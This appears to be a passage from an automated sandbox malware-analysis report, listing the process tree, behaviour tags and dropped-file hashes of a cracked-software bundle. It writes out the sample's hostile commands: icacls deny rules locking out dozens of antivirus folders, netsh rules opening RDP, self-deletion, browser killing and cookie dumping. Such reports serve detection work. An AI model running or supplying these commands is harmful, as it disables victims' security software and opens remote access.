      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      PID:4664
      • C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny System:(F)
        Modifies file permissions
        PID:4732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
      PID:4724
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        Modifies file permissions
        PID:4788
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      PID:4796
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\MB3Install /deny System:(F)
        Modifies file permissions
        PID:4852
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
      PID:4860
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      PID:4876
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4960
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
      PID:5000
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
      PID:5064
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5108
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
      PID:4100
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      PID:2024
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:572
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
      PID:500
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4164
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
      PID:1648
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4176
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
      PID:992
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1812
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
      PID:3848
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3844
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
      PID:1188
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1300
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
      PID:3292
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4276
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
      PID:4248
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4296
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4368
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4380
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4440
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
      PID:4684
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4584
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
      PID:4564
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4704
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
      PID:4808
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4756
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
      PID:4892
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4840
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:4972
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4888
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:4936
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:5028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
      PID:5036
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      PID:5076
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:2224
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:1304
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3580
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:2512
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:3932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
      PID:664
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      PID:2188
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:1760
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
      PID:3008
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4192
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
      PID:4232
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:3492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
      PID:4300
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4308
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
      PID:4324
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4304
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
      PID:3524
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
      PID:4452
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4692
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
      PID:4660
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4596
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
      PID:4744
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4728
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
      PID:4884
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4828
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      PID:4916
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:5004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
      PID:5016
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4140
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      PID:1280
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4116
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
      PID:4120
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:2352
    • C:\Programdata\Install\utorrent.exe
      C:\Programdata\Install\utorrent.exe
      Executes dropped EXE
      Drops file in Program Files directory
      NTFS ADS
      Suspicious use of SetWindowsHookEx
      PID:576
      • C:\ProgramData\WindowsTask\azur.exe
        C:\ProgramData\WindowsTask\azur.exe
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        PID:3548
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
          PID:3280
          • C:\Windows\SysWOW64\timeout.exe
            C:\Windows\system32\timeout.exe 3
            Delays execution with timeout.exe
            PID:5080
      • C:\ProgramData\WindowsTask\system.exe
        C:\ProgramData\WindowsTask\system.exe
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\selfDel.bat" "
          PID:960
      • C:\ProgramData\RDPWinst.exe
        C:\ProgramData\RDPWinst.exe -u
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        PID:4216
        • C:\Windows\SYSTEM32\netsh.exe
          netsh advfirewall firewall delete rule name="Remote Desktop"
          PID:5792
      • C:\ProgramData\RDPWinst.exe
        C:\ProgramData\RDPWinst.exe -i
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        PID:5316
        • C:\Windows\SYSTEM32\netsh.exe
          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
          PID:5300
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Drops file in System32 directory
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:2228
  • C:\Programdata\RealtekHD\taskhost.exe
    C:\Programdata\RealtekHD\taskhost.exe
    Executes dropped EXE
    Drops file in System32 directory
    Suspicious behavior: GetForegroundWindowSpam
    PID:4244
    • C:\Programdata\WindowsTask\winlogon.exe
      C:\Programdata\WindowsTask\winlogon.exe
      Executes dropped EXE
      PID:4656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        PID:4672
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /query /fo list
          PID:4868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig /flushdns
      PID:4160
      • C:\Windows\system32\ipconfig.exe
        ipconfig /flushdns
        Gathers network information
        PID:5636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c gpupdate /force
      PID:2716
      • C:\Windows\system32\gpupdate.exe
        gpupdate /force
        PID:4536
  • C:\Users\Admin\Desktop\api.exe
    "C:\Users\Admin\Desktop\api.exe"
    Executes dropped EXE
    Enumerates connected drives
    Writes to the Master Boot Record (MBR)
    Suspicious behavior: AddClipboardFormatListener
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of SetWindowsHookEx
    PID:1620
    • C:\Windows\SysWOW64\LaunchWinApp.exe
      "C:\Windows\system32\LaunchWinApp.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
      PID:5464
  • C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    "C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
    Executes dropped EXE
    PID:2304
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      PID:5052
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        Executes dropped EXE
        PID:5136
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        Executes dropped EXE
        PID:5216
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          Executes dropped EXE
          Suspicious use of SetThreadContext
          PID:5728
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            Executes dropped EXE
            PID:5868
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        Executes dropped EXE
        PID:5252
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        Executes dropped EXE
        PID:5448
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
          Executes dropped EXE
          Suspicious use of SetWindowsHookEx
          PID:5720
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:5948
          • C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe
            "C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe" -s
            Executes dropped EXE
            Drops file in Program Files directory
            PID:6140
            • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
              "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
              Executes dropped EXE
              Checks whether UAC is enabled
              Writes to the Master Boot Record (MBR)
              Suspicious use of NtSetInformationThreadHideFromDebugger
              Modifies system certificate store
              Suspicious use of SetWindowsHookEx
              PID:5192
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                Enumerates connected drives
                Suspicious use of FindShellTrayWindow
                PID:6020
              • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
                Executes dropped EXE
                Checks whether UAC is enabled
                Writes to the Master Boot Record (MBR)
                Suspicious use of SetThreadContext
                Checks SCSI registry key(s)
                Suspicious use of SetWindowsHookEx
                PID:5304
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:3312
                • C:\Users\Admin\AppData\Roaming\1605810348493.exe
                  "C:\Users\Admin\AppData\Roaming\1605810348493.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810348493.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5724
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:5940
                • C:\Users\Admin\AppData\Roaming\1605810353930.exe
                  "C:\Users\Admin\AppData\Roaming\1605810353930.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810353930.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5632
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:5424
                • C:\Users\Admin\AppData\Roaming\1605810359509.exe
                  "C:\Users\Admin\AppData\Roaming\1605810359509.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810359509.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5392
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:4836
                • C:\Users\Admin\AppData\Roaming\1605810362353.exe
                  "C:\Users\Admin\AppData\Roaming\1605810362353.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810362353.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5928
              • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
                Executes dropped EXE
                Checks whether UAC is enabled
                Writes to the Master Boot Record (MBR)
                Checks SCSI registry key(s)
                Suspicious use of SetWindowsHookEx
                PID:5372
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  PID:4004
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    Kills process with taskkill
                    PID:5360
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                  PID:5972
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:4880
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                PID:4824
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  Runs ping.exe
                  PID:5348
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
          Executes dropped EXE
          Checks whether UAC is enabled
          PID:4948
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
          Executes dropped EXE
          Adds Run key to start application
          PID:4056
          • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
            Executes dropped EXE
            PID:6120
          • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
            Executes dropped EXE
            PID:6112
  • C:\Users\Admin\Desktop\OnlineInstaller.exe
    "C:\Users\Admin\Desktop\OnlineInstaller.exe"
    Executes dropped EXE
    Checks for any installed AV software in registry
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:4404
    • C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp
      C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4856
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x3c4
    Suspicious use of AdjustPrivilegeToken
    PID:4780
  • C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe
    "C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe"
    Executes dropped EXE
    PID:4224
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:4284
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    PID:4800
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Suspicious use of AdjustPrivilegeToken
    PID:4580
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:4492
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:5408
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    PID:5456
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B1892284D68E555EFE733C0196F8E52E C
      Loads dropped DLL
      PID:4424
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    PID:5760
  • C:\Programdata\RealtekHD\taskhostw.exe
    C:\Programdata\RealtekHD\taskhostw.exe
    Executes dropped EXE
    PID:5712
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID:5272
Network
Downloads
  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files\Common Files\System\iediagcmd.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Program Files\RDP Wrapper\rdpwrap.dll

  • C:\Program Files\RDP Wrapper\rdpwrap.ini

  • C:\Program Files\RDP Wrapper\rdpwrap.ini

    MD5

    dddd741ab677bdac8dcd4fa0dda05da2

    SHA1

    69d328c70046029a1866fd440c3e4a63563200f9

    SHA256

    7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

    SHA512

    6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

  • C:\ProgramData\Microsoft\Intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    23d51bd68920fdfd90809197b8c364ff

    SHA1

    5eee02db6087702db49acb2619e37d74833321d9

    SHA256

    0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

    SHA512

    3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    23d51bd68920fdfd90809197b8c364ff

    SHA1

    5eee02db6087702db49acb2619e37d74833321d9

    SHA256

    0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

    SHA512

